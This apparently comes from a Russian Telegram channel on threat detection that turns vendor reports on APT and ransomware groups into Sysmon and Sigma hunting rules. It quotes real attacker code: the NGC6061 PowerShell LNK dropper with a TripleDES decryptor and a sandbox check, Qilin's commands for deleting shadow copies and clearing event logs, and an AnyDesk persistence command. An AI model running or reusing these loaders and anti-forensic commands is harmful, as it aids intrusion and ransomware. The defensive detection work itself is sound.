Всем привет! 💻 ✌️
Давайте рассмотрим несколько способов закрепления в системе, которые использовали Lazarus😤
Они использовали уязвимость - Phantom DLL Loading, в службе SessionEnv
Для обнаружения такого поведения можем отслеживать создание dll-файлов в директории
🔭 Обнаружение:
#detection@detectioneasy
#ttp@detectioneasy
Давайте рассмотрим несколько способов закрепления в системе, которые использовали Lazarus
Они использовали уязвимость - Phantom DLL Loading, в службе SessionEnv
Для обнаружения такого поведения можем отслеживать создание dll-файлов в директории
Windows\System32\
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and
(
TargetFilename contains \Windows\System32\TSMSISrv.dll
or
TargetFilename contains \Windows\System32\TSVIPSrv.dll
)
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Fox-IT International blog
Three Lazarus RATs coming for your cheese
Authors: Yun Zheng Hu and Mick Koomen Introduction In the past few years, Fox-IT and NCC Group have conducted multiple incident response cases involving a Lazarus subgroup that specifically targets…
👍8🔥5🥰4
Всем привет! 💻 ✌️
Коллеги из bi.zone уведомили о новых техниках Fluffy Wolf
Давайте вспомним как это было в прошлогоднем отчете. Хакеры использовали схему фишинга
🔭 Обнаружение:
🔤 в двух кампаниях злоумышленники используют раширение
🔤 можем похантить имена файлов с
🔤 создать правило обнаружения таких файлов
#detection@detectioneasy
#ttp@detectioneasy
Коллеги из bi.zone уведомили о новых техниках Fluffy Wolf
Давайте вспомним как это было в прошлогоднем отчете. Хакеры использовали схему фишинга
RAR (с паролем) -> COM. Примечательно, что пароль был указан в имени архива, возможно использовалось для обхода антифишингаcom, вместо exe, можем этим воспользоваться для хантинга"парол|pass"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename contains "\Users\" and (Image contains "парол" or Image contains "pass")
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename contains "\Users\" and (Image endswith ".com")
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
«Давайте сверимся»: как Fluffy Wolf использует акты сверки в атаках
Группировка действует просто, но эффективно: фишинговая рассылка для первоначального доступа, а в ней — исполняемый файл. Так Fluffy Wolf получает удаленный доступ, крадет учетные данные или использует ресурсы взломанной инфраструктуры для майнинга
🔥11👍7❤2🤔2
Всем привет! 💻 ✌️
Команда any.run выпустила интересный материал о применении SVG-файлов в фишинге.
Что важно помнить?
Файл формата SVG (векторная графика), часто используется злоумышленниками для обхода стандартных механизмов защиты. Такие файлы могут содержать код скриптов
🔭 Обнаружение:
🔤 можем отслеживать создание SVG-файлов в каталогах пользователей:
#detection@detectioneasy
#ttp@detectioneasy
Команда any.run выпустила интересный материал о применении SVG-файлов в фишинге.
Что важно помнить?
Файл формата SVG (векторная графика), часто используется злоумышленниками для обхода стандартных механизмов защиты. Такие файлы могут содержать код скриптов
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename contains "\\Users\\" and TargetFilename endswith ".svg"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
ANY.RUN
🚨 Malicious SVG Leads to Microsoft-Themed PhishKit.
We observed a phishing campaign that began with testing activity on September 10 and scaled into full spam activity by September 15.
⚠️ A legitimate domain was abused to host a malicious SVG disguised…
We observed a phishing campaign that began with testing activity on September 10 and scaled into full spam activity by September 15.
⚠️ A legitimate domain was abused to host a malicious SVG disguised…
🔥8❤4👍4
Всем привет! 💻 ✌️
Коллеги из ЛК отметили, что группировка RevengeHotels (TA558) использует LLM для разработки дроперов на JS. Отличительная особенность - большое количество комментариев и отсутствие обфускации
🔭 Обнаружение:
🔤 Ищем JS-файлы по паттерну
🔤 Для закрепа VenomRAT использует ключ реестра
обнаружим
🔤 Малварь копирует себя на съемные диски под именем
#detectioneasy
#ttp@detectioneasy
Коллеги из ЛК отметили, что группировка RevengeHotels (TA558) использует LLM для разработки дроперов на JS. Отличительная особенность - большое количество комментариев и отсутствие обфускации
*.js в директориях пользователя
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename endswith ".js" and TargetFilename contains ":\Users\"
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
ProviderName="Microsoft-Windows-Sysmon" and EventId=13 and EventType="SetValue" and TargetObject startswith "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
обнаружим
Run, RunOnce, RunOnceExMy Pictures.exe. Отслеживаем создание EXE-файлов на съемных устройствах
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename endswith ".exe" and TargetFilename matches "[C-M]:\\\\.*" and not Image endswith "explorer.exe"
#detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9🤔5👍4
Всем привет! 💻 ✌️
Коллеги из Zero Salarium описали кейс, когда при создании новой задачи или службы указывается несуществующий исполняемый файл, например,
При создании процесса
Таким образом, если в папке
Такой же трюк можно сделать с двойным расширением:
В задаче указываем
В целом ничего страшного не происходит, нужно проверить (доработать), что автореспонс (и скрипты) найдут файл, указанный в задаче
🔭 Обнаружение (Threat Hunting):
🔤 мониторим процессы и файлы с двойным расширением
🔤 можем смапить путь к файлу в реестре (задаче или службы) и его наличие на диске
#detectioneasy
#ttp@detectioneasy
Коллеги из Zero Salarium описали кейс, когда при создании новой задачи или службы указывается несуществующий исполняемый файл, например,
C:\TMP\testПри создании процесса
CreateProcess пытается найти указанный файл, если test не существует, система автоматически ищет в той же директории файл test.exeТаким образом, если в папке
C:\TMP\ лежит файл test.exe, он будет успешно запущенТакой же трюк можно сделать с двойным расширением:
В задаче указываем
c:\temp\test.exe, а в директории будет файл c:\temp\test.exe.exeВ целом ничего страшного не происходит, нужно проверить (доработать), что автореспонс (и скрипты) найдут файл, указанный в задаче
#detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Zerosalarium
Stealthy Persistence With Non-Existent Executable File
Exploiting the mechanism that automatically searches for additional executable files when Windows detects that the requested file does not exist
🔥10
Всем привет! 💻 ✌️
Solar выпустил отчет о фишинговых кампаниях, применяемых группировкой NGC6061
Атака начинается с фишингового письма, которое содержит
При запуске ярлыка выполняется следующий ps-скрипт. Скрипт извелекает из
Второй скрипт расшифровывает полезную нагрузку, проверяет количество логических процессоров и если их меньше двух 2, то запускает decoy, иначе запускает бинарь
Интересно, что пути захардкожены
🔭 Для обнаружения достаточно индикаторов:
🔤 Создание LNK с ADS NTFS в
🔤 Анализ опасных-командлетов powershell
#detectioneasy
#ttp@detectioneasy
Solar выпустил отчет о фишинговых кампаниях, применяемых группировкой NGC6061
Атака начинается с фишингового письма, которое содержит
ZIP -> self-extracted LNKПри запуске ярлыка выполняется следующий ps-скрипт. Скрипт извелекает из
LNK два файла - ps1, decoy-docx, сохраняет их в c:\windows\Temp и запускает
powershell.exe -exec bypass -w 1 -c $p=Get-ChildItem -Path $env:userprofile -Include Interview_questions.doc.lnk -Recurse;
$tbytes=[System.IO.File]::ReadAllBytes($p); $tstr=$tbytes|ForEach-Object{$_.ToString('X2')};
for($i=0;$i-le$tstr.Length;$i++){
if($tstr[$i]-eq'24'-and$tstr[$i+1]-eq'42'){
$st=$i;break;
}
}
for($i=0;$i-le$tstr.Length;$i++){
if($tstr[$i]-eq'50'-and$tstr[$i+1]-eq'4B'-and$tstr[$i+2]-eq'03'){
$ed=$i;
break;
}
}
for($j=$st;$j-lt$ed;$j++){
$ec+=$tstr[$j]
}
for($l=$ed;$l-le$tstr.Length;$l++){
$oc+=$tstr[$l];
}
$by=[byte[]]($ec -split '([0-9a-f]{2})'|Where-Object{$_ -match '[0-9a-f]{2}'}|ForEach-Object{[Convert]::ToByte($_, 16)});
$cy=[byte[]]($oc -split '([0-9a-f]{2})'|Where-Object{$_ -match '[0-9a-f]{2}'}|ForEach-Object{[Convert]::ToByte($_, 16)}); $ye=[system.Text.Encoding]::default.getstring($by); [System.IO.File]::WriteAllBytes('c:\windows\temp\u1.ps1', $by); [System.IO.File]::WriteAllBytes('c:\windows\temp\1.docx', $cy);
start-process c:\windows\temp\1.docx;
powershell.exe -exec bypass -w 1 -f c:\windows\temp\u1.ps1;
Второй скрипт расшифровывает полезную нагрузку, проверяет количество логических процессоров и если их меньше двух 2, то запускает decoy, иначе запускает бинарь
$B64="<base64_encode_str>"
$TDESKEY = 'fRTYUIOEGo6nMYPcyCnEJc4qVRTkGY82'
function decode($EncryptedData) {
$Data = $EncryptedData.Split(':')
$TD = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
$Key = [Convert]::FromBase64String($TDESKEY)
$IV = [Convert]::FromBase64String($Data[0])
$DataByte = [Convert]::FromBase64String($Data[1])
$MS = New-Object System.IO.MemoryStream(,$DataByte)
$CS = New-Object System.Security.Cryptography.CryptoStream($MS,$TD.CreateDecryptor($Key,$IV), [System.Security.Cryptography.CryptoStreamMode]::Read)
$Reader = New-Object System.IO.StreamReader($CS)
$Result = $Reader.ReadToEnd()
$Reader.Dispose()
$Bytes=[System.Convert]::FromBase64String($Result)
[System.IO.File]::WriteAllBytes( "c:\windows\temp\cgi2.exe",$Bytes)
return $Bytes
}
$t3=Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty NumberOfLogicalProcessors;
if($t3 -le 2)
{
calc.exe;
}
else
{
[byte[]]$readb=decode($B64);
start-sleep(100);
c:\windows\temp\cgi2.exe
}
Интересно, что пути захардкожены
c:\windows\temp\%Temp% или в одной из директорий пользователяSystem.Security.Cryptography, WriteAllBytes, System.IO.File, ReadAllBytes, byte[], ToByte
#detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5🤔3
Всем привет! 💻 ✌️
Давайте продолжим обзор отчета Solar о фишинговых кампаниях, применяемых группировкой NGC6061
В 2025 году, группировка продолжает использовать
KeyScrambler.exe - антикейлоггер, уязвим к DLL sideloading
🔭 Обнаружение:
🔤 Отслеживание файлов с именем
🔤 Загрузка библиотеки с именем
UPD:
🔤 можем похантить в amcache и prefetch - KeyScrambler.exe
#detection@detectioneasy
#ttp@detectioneasy
Давайте продолжим обзор отчета Solar о фишинговых кампаниях, применяемых группировкой NGC6061
В 2025 году, группировка продолжает использовать
self-extracted LNK, но последним этапом стал дроп файлов KeyScrambler.exe и KeyScramblerIE.dll, (exe-легитимный бинарь, а dll-metasploit дропер)KeyScrambler.exe - антикейлоггер, уязвим к DLL sideloading
KeyScramblerIE.dll. Можем похантить в $mft
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename contains "KeyScramblerIE.dll"
KeyScramblerIE.dll
ProviderName="Microsoft-Windows-Sysmon" and EventId=7
and Image endswith "KeyScrambler.exe"
and ImageLoaded endswith "KeyScramblerIE.dll"
and SignatureStatus != "Valid"
and Signature != "QFX Software Corporation"
UPD:
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
rt-solar.ru
NGC6061: Фишинговая атака на госорганы России в 2024-2025 годах
Технический анализ фишинговой кампании NGC6061 против госсектора. Рассматриваем самораспаковывающиеся LNK-файлы, Powershell-скрипты и уникальный пакер для Metasploit. Подробный разбор угрозы
🔥7👍3
Всем привет! 💻 ✌️
Продолжим рассматривать уязвимости, связанные с загрузкой dll
Notepad++ уязвим к DLL hijacking, на GitHub представили poc CVE-2025-56383
🔭 Обнаружение:
🔤 Можем отслеживать создание DLL -
🔤 Можем отслеживать загрузку в память библиотеки без подписи
#detection@detectioneasy
#ttp@detectioneasy
Продолжим рассматривать уязвимости, связанные с загрузкой dll
Notepad++ уязвим к DLL hijacking, на GitHub представили poc CVE-2025-56383
NppConverter.dll, без EXE - notepad++.exe
ProviderName="Microsoft-Windows-Sysmon" and EventId=7
and Image endswith "notepad++.exe"
and ImageLoaded endswith "NppExport.dll"
and SignatureStatus != "Valid"
and Signature != "Notepad++"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤3👏3
Всем привет! 💻 ✌️
Давайте познакомимся с отчетом коллег из Angara MTDR
Фишинговое письмо содрежит
🔭 Обнаружение:
🔤 отслеживать в командной строке совпадение с
🔤 отслеживать по запуску и подписи бинаря, наличию в командной строке
#detection@detectioneasy
#ttp@detectioneasy
Давайте познакомимся с отчетом коллег из Angara MTDR
Фишинговое письмо содрежит
*.scr файл который мимикрирует под PDF, после его открытия извлекаются несколько файлов cmd и bat. Одна из команд создает закреп через AnyDesk
echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
".exe --set-password". Пример правила есть в Sigma, как по мне нужно добавить \.exe|\.scr|\.com--set-password
Description: AnyDesk
Product: AnyDesk
Company: AnyDesk Software GmbH
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
www.angarasecurity.ru
Специалисты Angara MTDR зафиксировали активизацию деятельности группировки Rare Werewolf
Специалисты Angara MTDR зафиксировали активизацию деятельности группировки Rare Werewolf. Angara Security: Бесперебойно отражаем и предотвращаем киберугрозы для бизнеса и государства
🔥6❤2👍2
Всем привет! 💻 ✌️
В разборе TTP Qilin авторы описывают этап подготовки перед шифрованием
🔤 остановка службы и удаление теневых копий
🔤 очистка логов во всех журналах
🔤 закреп в реестре
🔭 Обнаружение:
🔤 отслеживаем использование
🔤 отслеживаем использование ps -
🔤 создание новых ключей в ветке реестра
#detection@detectioneasy
#ttp@detectioneasy
В разборе TTP Qilin авторы описывают этап подготовки перед шифрованием
wmic service where name=’vss’ call ChangeStartMode Manual
net start vss
vssadmin.exe delete shadows /all /quiet
net stop vss
wmic service where name=’vss’ call ChangeStartMode Disabled
“powershell” $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
wmic, vssadminClearLog, Get-WinEvent*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
ASEC
선택적 암호화 알고리즘을 사용하는 Qilin 랜섬웨어 분석 - ASEC
선택적 암호화 알고리즘을 사용하는 Qilin 랜섬웨어 분석 ASEC
🔥8👍2🤔2
Кроме всего при создании закрепа Qilin начинают имя ключа со * в ветке реестра SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Для чего?
Для чего?
Anonymous Quiz
48%
Обход правил обнаружения
22%
Запутывание, ничего не отработает
30%
Файл запустится в безопасном режиме
Всем привет! 💻 ✌️
Давайте рассмотрим интересную технику доставки из отчета ЛК
Злоумышленники использовали Squirrel и
Перед запуском приложения оно копируется в пользовательскую директорию
Для запуска обновления Squirrel необходим файлы
🔭 Обнаружение:
🔤 можем отслеживать создание файла
🔤 отслеживаем создание
🔤 отслеживаем создание и загрузку в память неподписанной библиотеки
В репозитории Sigma также есть правило
#detection@detectioneasy
#ttp@detectioneasy
Давайте рассмотрим интересную технику доставки из отчета ЛК
Злоумышленники использовали Squirrel и
NodeJS loader для запуска легетимного приложения уязвимого к загрузки dllПеред запуском приложения оно копируется в пользовательскую директорию
VideoДля запуска обновления Squirrel необходим файлы
RELEASES и *.nupkgRELEASES и *.nupkg в одной директории*.exe и *.dll в пользовательских директориях, например Videochrome_elf.dllВ репозитории Sigma также есть правило
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Securelist
Coyote: A multi-stage banking Trojan abusing the Squirrel installer
We will delve into the workings of the infection chain and explore the capabilities of the new Trojan that specifically targets users of more than 60 banking institutions, mainly from Brazil.
🔥8🎄4👍2
Всем привет! 💻 ✌️
У многих на слуху DFIR/TH инструмент Velociraptor🦖 . Он позволяет централизованно собирать артефакты, события из журналов и много чего еще, а также выполнять команды
Приложение является клиент-сервером, клиенты устанавливаются в роли службы с правами root или system
Виндовый клиент еще подписан - rapid7
Сложилось все, чтобы Velociraptor попал в категорию RMM (Remote monitoring and management) и стал использоваться хакерами в атаках
Solar упоминали об этом еще в 2024 году
Rapid7 дали рекомендации по обнаружению
🔭 Обнаружение:
🔤 по метаинформации файла
🔤 при первом запуске создается ключ в реестре
🔤 отслеживаем аргументы
для cmd
🔤 Rapid7 предложило Sigma-правило, в котором отслеживаются аргументы командой строки
🔤 также во время работы создаются два файла с расширениями
#detection@detectioneasy
#ttp@detectioneasy
У многих на слуху DFIR/TH инструмент Velociraptor
Приложение является клиент-сервером, клиенты устанавливаются в роли службы с правами root или system
Виндовый клиент еще подписан - rapid7
Сложилось все, чтобы Velociraptor попал в категорию RMM (Remote monitoring and management) и стал использоваться хакерами в атаках
Solar упоминали об этом еще в 2024 году
Rapid7 дали рекомендации по обнаружению
Description: Velociraptor: Digging Deeper!
Product: Velociraptor
Company: Rapid 7 Inc
OriginalFileName: Velociraptor.exe
HKLM\System\CurrentControlSet\Services\EventLog\Application\Velociraptor
-ExecutionPolicy Unrestricted -encodedCommand команды выполняются в следующем виде, если артефакт powershell и команда dir
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -encodedCommand ZABpAHIA
для cmd
cmd.exe /c dir
selection_velociraptor:
Image|endswith: '\Velociraptor.exe'
selection_suspicious_args:
CommandLine|contains:
- "--config"
- "client.config.yaml"
- "service run"
selection_unsigned:
Signature|endswith:
- "Unsigned"
condition: selection_velociraptor and (selection_suspicious_args or selection_unsigned)
yaml и yaml.bak#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍2🤔2